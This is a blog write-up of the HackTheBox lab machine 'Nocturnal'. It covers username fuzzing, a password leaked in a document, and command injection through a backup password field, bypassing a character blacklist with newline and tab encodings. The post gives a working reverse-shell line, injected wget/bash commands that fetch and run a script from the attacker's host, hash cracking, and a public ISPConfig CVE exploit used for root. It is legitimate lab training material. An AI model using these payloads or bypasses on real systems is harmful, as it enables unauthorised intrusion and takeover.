Post

HTB Nocturnal Writeup (Walkthrough)

Posted Updated
Preview Image
By Iven
5 min read
HTB Nocturnal Writeup (Walkthrough)

Introduction

Nocturnal is an easy-difficulty Linux machine on HackTheBox that provides an engaging challenge focused on web application security and privilege escalation. This writeup documents my methodical approach to compromising the machine, from initial reconnaissance to obtaining root access.

The machine features a web application with file upload functionality, which leads to discovering sensitive credentials through careful enumeration. The path to root involves exploiting a command injection vulnerability in the admin panel, cracking password hashes from a database, and finally leveraging a known vulnerability in ISPConfig 3.2 to achieve root privileges.

This machine demonstrates several common web application security flaws:

  1. Information disclosure through accessible files
  2. Command injection through insufficient input sanitization
  3. Credential reuse across different services
  4. Unpatched software with known vulnerabilities

Throughout this writeup, I’ll provide detailed explanations of each technique used, the underlying vulnerabilities, and the thought process behind the exploitation path. This serves as both documentation of the penetration test and a learning resource for understanding web application security concepts.

Let’s begin by exploring the initial attack surface of the machine.

Initial Reconnaissance

First, I performed a port scan using Nmap to identify open services:

1

nmap -sC -sV -oA Nocturnal nocturnal.htb

Results showed only two open ports:

  • Port 22: SSH (OpenSSH 8.2p1)
  • Port 80: HTTP (nginx 1.18.0)

Web Application Enumeration

Accessing the web application at http://nocturnal.htb, I found a login page with registration functionality.

  1. Created a new user:
    • Username: ds
    • Password: password123
  2. After login, I discovered a file upload page with restrictions:
    • Only specific file types were allowed: pdf, doc, docx, xls, xlsx, odt
  3. Uploaded an xlsx file which was successfully listed under “Your Files”
    • URL pattern: http://nocturnal.htb/view.php?username=ds&file=ds.xlsx

Parameter Fuzzing

Used ffuf to check for other usernames in the view.php parameter:

1

ffuf -u 'http://nocturnal.htb/view.php?username=FUZZ&file=ds.xlsx' -w common.txt -H 'Cookie: PHPSESSID=23gacrglstnhn5g5h2b9op9mo2' -fs 2985

Discovered three existing usernames:

  • admin
  • amanda
  • ds (my own account)

Credential Discovery

Accessing the file viewer for amanda’s account at:

1

http://nocturnal.htb/view.php?username=amanda&file=ds.xlsx

Found a privacy.odt file available for download, which contained sensitive information:

Dear Amanda, Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure. …

Accessing Admin Panel

  1. Logged in as amanda using the discovered credentials:
    • Username: amanda
    • Password: arHkG7HAI68X8s1J
  2. Found an “Admin Panel” option which provided access to:
    • File structure viewer (PHP files only)
    • File content viewer
    • Backup creation functionality

Command Injection Vulnerability

Examining the admin.php source code, I identified a critical command injection vulnerability in the backup function:

1

$command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " .  > " . $logFile . " 2>&1 &";

The $password parameter was insufficiently sanitized, even though there was an attempt with the cleanEntry() function:

1
2
3
4
5
6
7
8
9
10
11

function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];

    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false; // Malicious input detected
        }
    }

    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}

This function could be bypassed using newline characters (%0A) and tab characters (%09) instead of spaces.

Gaining Initial Access

  1. Set up a netcat listener: 
    1

    nc -lvnp 2244
  2. Created a shell.sh file with a reverse shell payload: 
    1

    sh -i >& /dev/tcp/10.10.16.59/2244 0>&1
  3. Started a Python HTTP server to host the shell script: 
    1

    python3 -m http.server
  4. Executed the command injection in two steps:
    • First, download the shell script: 
      1

      password=%0Abash%09-c%09"wget%0910.10.16.59/shell.sh"%0A&backup=
    • Then execute it: 
      1

      password=%0Abash%09-c%09"bash%09shell.sh"%0A&backup=
  5. Successfully gained a shell as the web server user.

User Flag

  1. Discovered a SQLite database: 
    1
2
3

    $ cd /var/www/nocturnal_database
$ ls
nocturnal_database.db
  2. Set up a Python HTTP server to download the database: 
    1

    python3 -m http.server 2245
  3. Examined the database with DB Browser for SQLite and found multiple user password hashes:
    • admin:d725aeba143f575736b07e045d8ceebb
    • amanda:df8b20aa0c935023f99ea58358fb63c4
    • tobias:55c82b1ccd55ab219b3b109b07d5061d
  4. Found the only non-web user in /home: 
    1
2
3

    $ cd /home
$ ls
tobias
  5. Cracked the password hash using John the Ripper: 
    1

    sudo john hash_pass.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5
    • Result: tobias:slowmotionapocalypse
  6. SSH as tobias and obtain the user flag: 
    1
2
3

    $ ssh [email protected]
$ cat user.txt
9e5f92e51ac10bd0d9dafafe4692f506

Privilege Escalation

  1. Checked for running services: 
    1

    tobias@nocturnal:~$ ss -tuln

  2. Found several interesting internal services, including a web server on port 8080

  3. Set up SSH port forwarding to access the internal web service: 
    1

    ssh [email protected] -L 9090:127.0.0.1:8080

  4. Accessing http://127.0.0.1:9090 revealed an ISPConfig login page

  5. Identified ISPConfig version 3.2 from the CSS links: 
    1

    <link rel='stylesheet' href='../themes/default/assets/stylesheets/ispconfig.css?ver=3.2' />

  6. Found a known vulnerability (CVE-2023-46818) with an available exploit: https://github.com/bipbopbup/CVE-2023-46818-python-exploit/

  7. Used the exploit with the previously cracked password: 
    1

    python3 ./exploit.py http://127.0.0.1:9090 admin slowmotionapocalypse
  8. Successfully gained root shell and obtained the root flag: 
    1
2

    ispconfig-shell# cat /root/root.txt
45631dfea44685a8737a235746dc1f92

Summary

This machine involved several key steps:

  1. Web application enumeration and discovery of a file viewer vulnerability
  2. Finding leaked credentials in an accessible document
  3. Exploiting a command injection vulnerability in the admin panel
  4. Accessing a database with user credentials
  5. Cracking password hashes to gain SSH access
  6. Using SSH port forwarding to access an internal service
  7. Exploiting a known vulnerability in ISPConfig 3.2 to gain root privileges

The path to root demonstrated multiple common web application vulnerabilities and the importance of proper input sanitization, as well as the risk of using the same password across multiple services.

Done!

Hi there 👋 Support me!

Life is an echo—what you send out comes back.

Donate

HackTheBox, Writeup, Easy
Writeup HTB-Easy
This post is licensed under CC BY 4.0 by the author.